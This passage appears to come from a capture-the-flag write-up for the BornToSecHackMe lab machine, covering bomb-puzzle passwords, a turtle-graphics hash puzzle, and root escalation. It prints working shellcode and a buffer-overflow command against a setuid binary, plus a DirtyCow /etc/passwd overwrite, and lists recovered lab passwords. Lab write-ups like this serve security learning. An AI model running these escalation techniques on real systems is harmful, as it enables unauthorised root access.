134525656 int *n34 = { 107, 134525620, 134525560, 6 } ``` ##### 3rd recursion n34[2]: ``` x/4d 134525560 int *n48 = { 1001, 0, 0, 47 } ``` At the 3rd recursion param_1[0] == 1001, so we need to send 1001 to stop the recursion and return 0; ```bash $> ./bomb test Welcome this is my little bomb !!!! You have 6 stages with only one life good luck !! Have a nice day! Phase 1 defused. How about the next one? That's number 2. Keep going! Halfway there! So you got that one. Try this one. Good work! On to the next... Curses, you've found the secret phase! But finding it and solving it are quite different... 1001 Wow! You've defused the secret stage! Congratulations! You've defused the bomb! ``` ## "thor" password Le readme ``` Diffuse this bomb! When you have all the password use it as "thor" user with ssh. HINT: P 2 b o 4 NO SPACE IN THE PASSWORD (password is case sensitive). ``` Les "mots de passes" des phases ``` Public speaking is very easy. 1 2 6 24 120 720 1 b 214 9 austinpowers opekma 4 2 6 3 1 5 ``` > pour la phase5 il y a de nombreuses posibilité: opekma, opukma, opukmq ou opekmq Nous avons testé differentes combinaison sans succes (Permission denied, please try again.) ``` Publicspeakingisveryeasy.126241207201b2149austinpowersopekma426315 Publicspeakingisveryeasy.126241207201b2149austinpowersopekma4263151001 Publicspeakingisveryeasy.126241207201b2149opekma426315 Publicspeakingisveryeasy.126241207201b2149opekma4263151001 Publicspeakingisveryeasy.126241207201b2149austinpowersopukma426315 Publicspeakingisveryeasy.126241207201b2149austinpowersopukma4263151001 Publicspeakingisveryeasy.126241207201b2149opukma426315 Publicspeakingisveryeasy.126241207201b2149opukma4263151001 Publicspeakingisveryeasy.126241207201b2149austinpowersopukmq426315 Publicspeakingisveryeasy.126241207201b2149austinpowersopukmq4263151001 Publicspeakingisveryeasy.126241207201b2149opukmq426315 Publicspeakingisveryeasy.126241207201b2149opukmq4263151001 Publicspeakingisveryeasy.126241207201b2149austinpowersopekmq426315 Publicspeakingisveryeasy.126241207201b2149austinpowersopekmq4263151001 Publicspeakingisveryeasy.126241207201b2149opekmq426315 Publicspeakingisveryeasy.126241207201b2149opekmq4263151001 ``` On as fini par trouver un message sur stackoverflow, il y a une erreur dans l'exercice, il faut inverser les deux avant dernier caracteres 315 -> 135 > https://stackoverflow.com/c/42network/questions/664 Ce qui nous donne: `Publicspeakingisveryeasy.126241207201b2149opekmq426135` ```bash ssh thor@192.168.1.36 ____ _______ _____ | _ \ |__ __| / ____| | |_) | ___ _ __ _ __ | | ___| (___ ___ ___ | _ < / _ \| '__| '_ \| |/ _ \\___ \ / _ \/ __| | |_) | (_) | | | | | | | (_) |___) | __/ (__ |____/ \___/|_| |_| |_|_|\___/_____/ \___|\___| Good luck & Have fun thor@192.168.1.36's password: Publicspeakingisveryeasy.126241207201b2149opekmq426135 thor@BornToSecHackMe:~$ ``` ## Thor Account ```bash $> cat README Finish this challenge and use the result as password for 'zaz' user. $> cat turtle Tourne gauche de 90 degrees Avance 50 spaces Avance 1 spaces Tourne gauche de 1 degrees Avance 1 spaces ... Tourne droite de 90 degrees Avance 100 spaces Recule 200 spaces Can you digest the message? :) ``` Turtle is the name of a python graphic library and the file instructions look like the lib commands. > https://docs.python.org/3/library/turtle.html So I've made a python script to parse the instructions and draw the path: ```python= import turtle import os, re turtle.speed('fastest') turtle.pendown() turtleFile = open("turtle").read() for line in iter(turtleFile.splitlines()): lineSp = line.split() if len(lineSp) > 0: if (lineSp[0] == 'Tourne'): left = lineSp[1] == 'gauche' lenght = int(lineSp[3]) if (left): turtle.left(lenght) else: turtle.right(lenght) elif (lineSp[0] == 'Avance'): lenght = int(lineSp[1]) turtle.forward(lenght) elif (lineSp[0] == 'Recule'): lenght = int(lineSp[1]) turtle.backward(lenght) else: turtle.penup() tp = turtle.pos() turtle.setpos(turtle.Vec2D(tp[0] + 200, tp[1])) turtle.pendown() turtle.done() ```  ```bash zaz@192.168.1.36's password: slash/SLASH Permission denied, please try again. ``` A la fin du fichier `turtle` il y a le phrase: `"Can you digest the message? :)"`, message digest fait parfois réference aux hashs, j'ai donc essayé de passer le mot de passe au md5 et bingo c'etait bien ça 🎉. ```bash su zaz Password: 646da671ca01bb5d84dbb5fb2238dc8e zaz@BornToSecHackMe:~$ ``` ## Zaz account ```bash ls -l total 5 -rwsr-s--- 1 root zaz 4880 Oct 8 2015 exploit_me drwxr-x--- 3 zaz zaz 107 Oct 8 2015 mail ``` ```bash zaz@BornToSecHackMe:~$ file ./exploit_me ./exploit_me: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x2457e2f88d6a21c3893bc48cb8f2584bcd39917e, not stripped zaz@BornToSecHackMe:~$ ./exploit_me AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped) ``` We can see the program raises a segfault signal when we pass large arguments, let's try to grab the offset of the stored EIP if the vulnerability is a buffer overflow For the sake of simplicity, we used this website https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/ to generate our string ```bash zaz@BornToSecHackMe:~$ gdb ./exploit_me GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". For bug reporting instructions, please see: <http://bugs.launchpad.net/gdb-linaro/>... Reading symbols from /home/zaz/exploit_me...(no debugging symbols found)...done. (gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag Starting program: /home/zaz/exploit_me Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag Program received signal SIGSEGV, Segmentation fault. 0x37654136 in ?? () ``` - When we input `0x37654136` in the step2 section of the website, we get the offset 140, this is the offset the stored EIP is starting to be overwritten - Store our shellcode in the environment with a large enough nopspled ```bash zaz@BornToSecHackMe:~$ export SHELLCODE=$(python -c 'print "\x90" * 1000')$(echo -n -e '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80') ``` - Grab the environment start address: `0xbffff87d` ```bash zaz@BornToSecHackMe:~$ gdb ./exploit_me GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 Copyright (C) 2012 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". For bug reporting instructions, please see: <http://bugs.launchpad.net/gdb-linaro/>... Reading symbols from /home/zaz/exploit_me...(no debugging symbols found)...done. (gdb) r A^CQuit (gdb) b main Breakpoint 1 at 0x80483f7 (gdb) r A Starting program: /home/zaz/exploit_me A Breakpoint 1, 0x080483f7 in main () (gdb) print *((char **)environ) $1 = 0xbffff87d "SHELLCODE=\220..." ``` - Start the program and overwrite EIP on the nopsled of our shellcode ```bash zaz@BornToSecHackMe:~$ python -c 'print hex(0xbffff87d - 50)' 0xbffff84bL zaz@BornToSecHackMe:~$ ./exploit_me $(python -c 'print "A"*140')$(echo -n -e '\x4b\xf8\xff\xbf') AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK��� # ls -la total 12 drwxr-x--- 4 zaz zaz 147 Oct 15 2015 . drwxrwx--x 1 www-data root 60 Oct 13 2015 .. -rwxr-x--- 1 zaz zaz 1 Oct 15 2015 .bash_history -rwxr-x--- 1 zaz zaz 220 Oct 8 2015 .bash_logout -rwxr-x--- 1 zaz zaz 3489 Oct 13 2015 .bashrc drwx------ 2 zaz zaz 43 Oct 14 2015 .cache -rwxr-x--- 1 zaz zaz 675 Oct 8 2015 .profile -rwxr-x--- 1 zaz zaz 1342 Oct 15 2015 .viminfo -rwsr-s--- 1 root zaz 4880 Oct 8 2015 exploit_me drwxr-x--- 3 zaz zaz 107 Oct 8 2015 mail # whoami root # ``` --- ___ ___ ___ ___ ___ ___ ___ --- ___ ___ ___ ___ ___ ___ ___ --- ___ ___ ___ ___ ___ ___ ___ # 2 Try to exploit ubuntu vulnerability ```bash > lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 12.04.5 LTS Release: 12.04 Codename: precise > uname -r 3.2.0-91-generic-pae ``` ## Try Dirtycow ```bash ./cowroot DirtyCow root privilege escalation Backing up /usr/bin/passwd to /tmp/bak Size of binary: 41284 Racing, this may take a while.. thread stopped thread stopped ... <- infinite loop ``` > https://www.exploit-db.com/exploits/40839 ```bash laurie@BornToSecHackMe:~$ gcc -pthread dirty.c -o dirty -lcrypt laurie@BornToSecHackMe:~$ ./dirty root /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: root Complete line: root:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash mmap: b7fda000 ^C laurie@BornToSecHackMe:~$ su root Password: root root@BornToSecHackMe:/home/laurie# cd root@BornToSecHackMe:~# ls README root@BornToSecHackMe:~# cat README CONGRATULATIONS !!!! To be continued... ``` # Try to access others accounts Users list with home ```bash $> awk -F: '$6 ~ /\/home/ {print}' /etc/passwd | awk -F: '{ print $1}' syslog ft_root lmezard laurie@borntosec.net laurie thor zaz ``` Les seuls comptes qu'on ne connais pas sont `syslog` et `ft_root` ## syslog ## ft_root ## Try bomb secret password `austinpowers1001` md5: `88f6e10c8ac682687db9b47dde12b008` `1001` md5: `b8c37e33defde51cf91e1e03e51657da` # chat / notes laurie 330b845f32185747e4f8ca15d40ca59796035c89ea809fb5d30f4da83ecf45a4 thor: Publicspeakingisveryeasy.126241207201b2149opekmq426135 zaz: 646da671ca01bb5d84dbb5fb2238dc8e